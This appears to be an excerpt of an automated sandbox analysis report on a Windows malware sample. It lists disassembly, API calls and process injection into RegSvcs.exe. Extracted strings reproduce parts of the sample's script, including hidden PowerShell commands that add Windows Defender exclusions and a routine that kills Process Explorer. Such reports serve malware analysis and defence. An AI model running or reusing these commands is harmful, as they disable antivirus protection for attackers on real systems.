                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1C97C mov eax, dword ptr fs:[00000030h]15_2_00F1C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F10946 mov eax, dword ptr fs:[00000030h]15_2_00F10946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F2892B mov eax, dword ptr fs:[00000030h]15_2_00F2892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1892A mov eax, dword ptr fs:[00000030h]15_2_00F1892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1C912 mov eax, dword ptr fs:[00000030h]15_2_00F1C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E88918 mov eax, dword ptr fs:[00000030h]15_2_00E88918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E88918 mov eax, dword ptr fs:[00000030h]15_2_00E88918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E908 mov eax, dword ptr fs:[00000030h]15_2_00F0E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E908 mov eax, dword ptr fs:[00000030h]15_2_00F0E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECAAEE mov eax, dword ptr fs:[00000030h]15_2_00ECAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECAAEE mov eax, dword ptr fs:[00000030h]15_2_00ECAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EE6ACC mov eax, dword ptr fs:[00000030h]15_2_00EE6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EE6ACC mov eax, dword ptr fs:[00000030h]15_2_00EE6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EE6ACC mov eax, dword ptr fs:[00000030h]15_2_00EE6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E90AD0 mov eax, dword ptr fs:[00000030h]15_2_00E90AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC4AD0 mov eax, dword ptr fs:[00000030h]15_2_00EC4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC4AD0 mov eax, dword ptr fs:[00000030h]15_2_00EC4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E98AA0 mov eax, dword ptr fs:[00000030h]15_2_00E98AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E98AA0 mov eax, dword ptr fs:[00000030h]15_2_00E98AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EE6AA4 mov eax, dword ptr fs:[00000030h]15_2_00EE6AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9EA80 mov eax, dword ptr fs:[00000030h]15_2_00E9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9EA80 mov eax, dword ptr fs:[00000030h]15_2_00E9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9EA80 mov eax, dword ptr fs:[00000030h]15_2_00E9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9EA80 mov eax, dword ptr fs:[00000030h]15_2_00E9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9EA80 mov eax, dword ptr fs:[00000030h]15_2_00E9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9EA80 mov eax, dword ptr fs:[00000030h]15_2_00E9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9EA80 mov eax, dword ptr fs:[00000030h]15_2_00E9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9EA80 mov eax, dword ptr fs:[00000030h]15_2_00E9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9EA80 mov eax, dword ptr fs:[00000030h]15_2_00E9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64A80 mov eax, dword ptr fs:[00000030h]15_2_00F64A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC8A90 mov edx, dword ptr fs:[00000030h]15_2_00EC8A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0CA72 mov eax, dword ptr fs:[00000030h]15_2_00F0CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0CA72 mov eax, dword ptr fs:[00000030h]15_2_00F0CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECCA6F mov eax, dword ptr fs:[00000030h]15_2_00ECCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECCA6F mov eax, dword ptr fs:[00000030h]15_2_00ECCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECCA6F mov eax, dword ptr fs:[00000030h]15_2_00ECCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3EA60 mov eax, dword ptr fs:[00000030h]15_2_00F3EA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0A5B mov eax, dword ptr fs:[00000030h]15_2_00EA0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0A5B mov eax, dword ptr fs:[00000030h]15_2_00EA0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E96A50 mov eax, dword ptr fs:[00000030h]15_2_00E96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E96A50 mov eax, dword ptr fs:[00000030h]15_2_00E96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E96A50 mov eax, dword ptr fs:[00000030h]15_2_00E96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E96A50 mov eax, dword ptr fs:[00000030h]15_2_00E96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E96A50 mov eax, dword ptr fs:[00000030h]15_2_00E96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E96A50 mov eax, dword ptr fs:[00000030h]15_2_00E96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E96A50 mov eax, dword ptr fs:[00000030h]15_2_00E96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBEA2E mov eax, dword ptr fs:[00000030h]15_2_00EBEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECCA24 mov eax, dword ptr fs:[00000030h]15_2_00ECCA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECCA38 mov eax, dword ptr fs:[00000030h]15_2_00ECCA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB4A35 mov eax, dword ptr fs:[00000030h]15_2_00EB4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB4A35 mov eax, dword ptr fs:[00000030h]15_2_00EB4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1CA11 mov eax, dword ptr fs:[00000030h]15_2_00F1CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1CBF0 mov eax, dword ptr fs:[00000030h]15_2_00F1CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBEBFC mov eax, dword ptr fs:[00000030h]15_2_00EBEBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E98BF0 mov eax, dword ptr fs:[00000030h]15_2_00E98BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E98BF0 mov eax, dword ptr fs:[00000030h]15_2_00E98BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E98BF0 mov eax, dword ptr fs:[00000030h]15_2_00E98BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB0BCB mov eax, dword ptr fs:[00000030h]15_2_00EB0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB0BCB mov eax, dword ptr fs:[00000030h]15_2_00EB0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB0BCB mov eax, dword ptr fs:[00000030h]15_2_00EB0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3EBD0 mov eax, dword ptr fs:[00000030h]15_2_00F3EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E90BCD mov eax, dword ptr fs:[00000030h]15_2_00E90BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E90BCD mov eax, dword ptr fs:[00000030h]15_2_00E90BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E90BCD mov eax, dword ptr fs:[00000030h]15_2_00E90BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F44BB0 mov eax, dword ptr fs:[00000030h]15_2_00F44BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F44BB0 mov eax, dword ptr fs:[00000030h]15_2_00F44BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0BBE mov eax, dword ptr fs:[00000030h]15_2_00EA0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0BBE mov eax, dword ptr fs:[00000030h]15_2_00EA0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8CB7E mov eax, dword ptr fs:[00000030h]15_2_00E8CB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3EB50 mov eax, dword ptr fs:[00000030h]15_2_00F3EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F38B42 mov eax, dword ptr fs:[00000030h]15_2_00F38B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F26B40 mov eax, dword ptr fs:[00000030h]15_2_00F26B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F26B40 mov eax, dword ptr fs:[00000030h]15_2_00F26B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5AB40 mov eax, dword ptr fs:[00000030h]15_2_00F5AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F44B4B mov eax, dword ptr fs:[00000030h]15_2_00F44B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F44B4B mov eax, dword ptr fs:[00000030h]15_2_00F44B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBEB20 mov eax, dword ptr fs:[00000030h]15_2_00EBEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBEB20 mov eax, dword ptr fs:[00000030h]15_2_00EBEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F58B28 mov eax, dword ptr fs:[00000030h]15_2_00F58B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F58B28 mov eax, dword ptr fs:[00000030h]15_2_00F58B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0EB1D mov eax, dword ptr fs:[00000030h]15_2_00F0EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0EB1D mov eax, dword ptr fs:[00000030h]15_2_00F0EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0EB1D mov eax, dword ptr fs:[00000030h]15_2_00F0EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0EB1D mov eax, dword ptr fs:[00000030h]15_2_00F0EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0EB1D mov eax, dword ptr fs:[00000030h]15_2_00F0EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0EB1D mov eax, dword ptr fs:[00000030h]15_2_00F0EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0EB1D mov eax, dword ptr fs:[00000030h]15_2_00F0EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0EB1D mov eax, dword ptr fs:[00000030h]15_2_00F0EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0EB1D mov eax, dword ptr fs:[00000030h]15_2_00F0EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC2CF0 mov eax, dword ptr fs:[00000030h]15_2_00EC2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC2CF0 mov eax, dword ptr fs:[00000030h]15_2_00EC2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC2CF0 mov eax, dword ptr fs:[00000030h]15_2_00EC2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC2CF0 mov eax, dword ptr fs:[00000030h]15_2_00EC2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8CCC8 mov eax, dword ptr fs:[00000030h]15_2_00E8CCC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40CB5 mov eax, dword ptr fs:[00000030h]15_2_00F40CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40CB5 mov eax, dword ptr fs:[00000030h]15_2_00F40CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40CB5 mov eax, dword ptr fs:[00000030h]15_2_00F40CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40CB5 mov eax, dword ptr fs:[00000030h]15_2_00F40CB5
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009C2CE0 GetProcessHeap,0_2_009C2CE0
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B6878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009B6878
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009BAAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009BAAC4
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B6A0B SetUnhandledExceptionFilter,0_2_009B6A0B
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B5BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009B5BBF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C829B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00C829B2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C70BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00C70BCF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C70D65 SetUnhandledExceptionFilter,10_2_00C70D65
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C70FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00C70FB1
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BF29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00BF29B2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00BE0BCF
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE0D65 SetUnhandledExceptionFilter,16_2_00BE0D65
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00BE0FB1

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 696008Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5CA008Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CB1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00CB1A91
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C53312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00C53312
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")memstr_ceeaafa6-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitemsmemstr_952c7147-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displaynamememstr_41402006-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nextmemstr_497197a5-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $usbmemstr_520b7b48-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>antivirusmemstr_109ea2cb-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func disabler()memstr_9dc74679-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;if antivirus() = "windows defender" thenmemstr_7627c459-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;#requireadminmemstr_1f034ff2-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)memstr_09b15654-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)memstr_796340c1-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)memstr_d0f8336b-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)memstr_b2efce6a-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)memstr_8f295d81-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)memstr_a1e72706-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endifmemstr_ba51ffc2-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>disablermemstr_7e355dbe-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()memstr_ca38d39e-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenmemstr_9de04aab-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")memstr_93e18e21-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")memstr_5d433c27-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")memstr_0063547c-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c:\x1ewmemstr_b1f5bc96-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usersmemstr_c24c2404-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usersdmemstr_c36e2674-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fusers@shell32.dll,-21813memstr_7249d318-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user~1memstr_09df3d4c-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user~1dmemstr_d3d532b1-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: frontdeskmemstr_62ad6d0a-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatamemstr_89b187d2-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdata@memstr_6d035bd3-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3*nappdatamemstr_02555b89-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localmemstr_19369423-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local<memstr_c1eea2d1-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _:+localmemstr_2b1e85a7-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: temp:memstr_1d4c5be1-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /tempmemstr_020fb1be-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pr}tr}tmemstr_8ef1529d-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q}tpq}t`q}tpq}t<q}tmemstr_6e1a5262-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p}tpd98memstr_cfde88ec-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ho}txo}tdo}t$o}tmemstr_f7f1033c-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xl}tho}txo}tdo}t$o}tmemstr_fe2f78fd-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n}txn}tdn}thn}t4n}t$n}tmemstr_a8570857-e
